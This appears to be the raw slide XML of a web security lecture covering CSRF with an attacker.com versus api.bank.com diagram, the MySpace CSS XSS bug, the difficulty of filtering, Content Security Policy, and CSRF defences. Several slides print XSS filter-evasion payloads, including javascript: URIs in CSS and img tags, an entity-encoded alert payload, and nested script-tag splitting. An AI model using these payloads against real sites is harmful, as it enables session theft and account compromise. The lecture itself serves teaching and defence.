            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="170266" cy="165758"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C82506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b="0" sz="4000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst>
                    <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="12700" dir="540000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</a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3449884" y="7098268"/>
            <a:ext cx="7448787" cy="516164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b="0" sz="40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pic>
        <p:nvPicPr>
          <p:cNvPr id="177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433529" y="7188375"/>
            <a:ext cx="382141" cy="335949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13962448" y="8551095"/>
            <a:ext cx="4572739" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="101600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:defRPr b="0" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="38100" dist="12700" dir="540000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</a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="179" name="web_server.tiff" descr="web_server.tiff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20277574" y="6771186"/>
            <a:ext cx="1059222" cy="1267013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="180" name="POST /transfer"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11873080" y="7035706"/>
            <a:ext cx="3315222" cy="5904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lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:defRPr b="0">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:t> /transfer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="api.bank.com"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19522833" y="8406081"/>
            <a:ext cx="2568703" cy="5604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api.bank.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="182" name="0484184d72076b38f8b68869d565ab1b-chocolate-chip-cookie-icon-by-vexels.png" descr="0484184d72076b38f8b68869d565ab1b-chocolate-chip-cookie-icon-by-vexels.png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6498848" y="7025868"/>
            <a:ext cx="516165" cy="516164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="attacker.com"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3453324" y="7076126"/>
            <a:ext cx="2491741" cy="5604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attacker.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="$.post({url: “api.bank.com/account“, …})"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2505495" y="8130185"/>
            <a:ext cx="8345241" cy="508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defRPr b="0" sz="2700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:t>({url: “api.bank.com/account“, …})</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="185" name="0484184d72076b38f8b68869d565ab1b-chocolate-chip-cookie-icon-by-vexels.png" descr="0484184d72076b38f8b68869d565ab1b-chocolate-chip-cookie-icon-by-vexels.png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7081261" y="7025868"/>
            <a:ext cx="516164" cy="516164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="186" name="51xnaPe5YuL._SL1000_.jpg" descr="51xnaPe5YuL._SL1000_.jpg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12421631" y="7960900"/>
            <a:ext cx="1180391" cy="1180391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="187" name="Cookie-based authentication is not sufficient  for requests that have any side affect"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4975769" y="9922050"/>
            <a:ext cx="17737797" cy="3099599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumOff val="-29866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 algn="l">
              <a:defRPr b="0" sz="7500">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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pPr>
            <a:r>
              <a:t>Cookie-based authentication is not sufficient </a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>for requests that have any side affect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="188" name="51xnaPe5YuL._SL1000_.jpg" descr="51xnaPe5YuL._SL1000_.jpg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1641497" y="9922050"/>
            <a:ext cx="3307609" cy="330761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MySpace Bug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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>MySpace Bug</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377" name="MySpace allowed users to post HTML to their pages. Filtered out…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="7994750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4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>MySpace allowed users to post HTML to their pages. Filtered out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:rPr>
              <a:t>&lt;script&gt;, &lt;body&gt;, onclick, &lt;a href=javascript://&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:latin typeface="Monaco"/>
              <a:ea typeface="Monaco"/>
              <a:cs typeface="Monaco"/>
              <a:sym typeface="Monaco"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr sz="4400">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr sz="4400"/>
              <a:t>Missed one. You can run Javascript inside of CSS tags.</a:t>
            </a:r>
            <a:endParaRPr sz="4400">
              <a:latin typeface="Monaco"/>
              <a:ea typeface="Monaco"/>
              <a:cs typeface="Monaco"/>
              <a:sym typeface="Monaco"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:latin typeface="Times Roman"/>
                <a:ea typeface="Times Roman"/>
                <a:cs typeface="Times Roman"/>
                <a:sym typeface="Times Roman"/>
              </a:defRPr>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:latin typeface="Monaco"/>
              <a:ea typeface="Monaco"/>
              <a:cs typeface="Monaco"/>
              <a:sym typeface="Monaco"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="6600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="4400"/>
              <a:t>&lt;div style="background:url('javascript:alert(1)')"&gt;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Filtering Malicious Tag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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Filtering Malicious Tags </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="For a long time, the only way to prevent XSS attacks was to try to filter out malicious content…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="7994750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4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>For a long time, the only way to prevent XSS attacks was to try to filter out malicious content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>Validate all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) against a rigorous specification of what is allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>‘Negative’ or attack signature based policies are difficult to maintain and are likely to be incomplete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Filtering is Really Hard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algn="l">
              <a:defRPr sz="1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pPr>
            <a:r>
              <a:t>Filtering is </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>Really</a:t>
            </a:r>
            <a:r>
              <a:t> Hard</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Large number of ways to call Javascript and to escape content…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="7994750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2700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>Large number of ways to call Javascript and to escape content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>URI Scheme: &lt;img src=“javascript:alert(document.cookie);”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>On{event} Handers: onSubmit, OnError, onSyncRestored, … (there’s ~105)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>Samy Worm: CSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>Tremendous number of ways of encoding content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4100">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;IMG</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:t>SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="388" name="Google XSS FIlter Evasion!"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16456552" y="11708722"/>
            <a:ext cx="6406097" cy="6841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900"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Google XSS FIlter Evasion!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Filters that Change Conten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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Filters that Change Content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Filter Action: filter out &lt;script…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3536278"/>
            <a:ext cx="21005800" cy="7994750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2700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1"/>
            </a:pPr>
            <a:r>
              <a:t>Filter Action: filter out </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="5E5E5E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="5E5E5E"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1"/>
            </a:pPr>
            <a:r>
              <a:t>Attempt 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:satOff val="-15798"/>
                    <a:lumOff val="-17517"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>&lt;script src= "…"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1"/>
            </a:pPr>
            <a:r>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumOff val="-13575"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>src="…"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1"/>
            </a:pPr>
            <a:r>
              <a:t>Attempt 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:satOff val="-15798"/>
                    <a:lumOff val="-17517"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>&lt;scr&lt;scriptipt src="..."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1"/>
            </a:pPr>
            <a:r>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumOff val="-13575"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>&lt;script src="..."&gt;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Content Security Policy (CSP)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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Content Security Policy (CSP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="398" name="You’re always safer using a whitelist- rather than blacklist-based approach…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3259508"/>
            <a:ext cx="21005800" cy="8466984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4900"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>You’re always safer using a whitelist- rather than blacklist-based approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="4900"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Content-Security-Policy</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>is an HTTP header that servers can send that declares which dynamic resources (e.g., Javascript) are allowed to execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="4900"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Good News: </a:t>
            </a:r>
            <a:r>
              <a:t>CSP eliminates XSS attacks by whitelisting the origins that are trusted sources of scripts and other resources and preventing all others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="4900"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1"/>
            </a:pPr>
            <a:r>
              <a:t>Bad News: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0"/>
              <a:t>CSP headers are complicated and folks frequently get the implementation incorrect.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Example CSP — Javascrip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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Example CSP — Javascript</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="403" name="Policies are defined as a set of directives for where different types of resources can be fetched. For example:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="8466984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4900"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>Policies are defined as a set of directives for where different types of resources can be fetched. For example:</a:t>
            </a:r>
            <a:br/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="457200">
              <a:lnSpc>
                <a:spcPts val="8500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="5100">
                <a:solidFill>
                  <a:srgbClr val="333333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rPr b="1"/>
              <a:t>Content-Security-Policy:</a:t>
            </a:r>
            <a:r>
              <a:t> script-src 'self'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>    → Javascript can only be loaded from the same domain as the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>    → No Javascript from any other origins will be executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="2700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>    → no inline </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;script&gt;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:t> will be executed</a:t>
            </a:r>
            <a:b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Preventing CSRF Attack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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Preventing CSRF Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Cookies do not indicate whether an authorized application submitted request since they’re included in every (in-scope) request…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21429813" cy="9362803"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>Cookies do not indicate whether an authorized application submitted request since they’re included in </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"/>
              <a:t>every</a:t>
            </a:r>
            <a:r>
              <a:t> (in-scope) request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>We need another mechanism that allows us to ensure that a request</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:t>is authentic (coming from a trusted page)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>Four commonly used techniques: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1117600" indent="-228600">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:t> Referer Validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1117600" indent="-228600">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:t> Secret Validation Token</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1117600" indent="-228600">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:t> Custom HTTP Header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1117600" indent="-228600">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:t> sameSite Cookies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Referer Validation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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Referer Validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="The Referer request header contains the address of the previous web page from which a link to the currently requested page was followed. The header allows servers to identify where people are visiting from.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3453840"/>
            <a:ext cx="21005800" cy="8320514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4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4700"/>
            </a:pPr>
            <a:r>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:t> request header contains the address of the previous web page from which a link to the currently requested page was followed. The header allows servers to identify where people are visiting from.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="100"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4700"/>
            </a:pPr>
            <a:r>
              <a:t>https://bank.com           →          https://bank.com          </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5600">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:hueOff val="914337"/>
                    <a:satOff val="31515"/>
                    <a:lumOff val="-30790"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>✓</a:t>
            </a:r>
            <a:endParaRPr sz="5600">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:hueOff val="914337"/>
                  <a:satOff val="31515"/>
                  <a:lumOff val="-30790"/>
                </a:schemeClr>
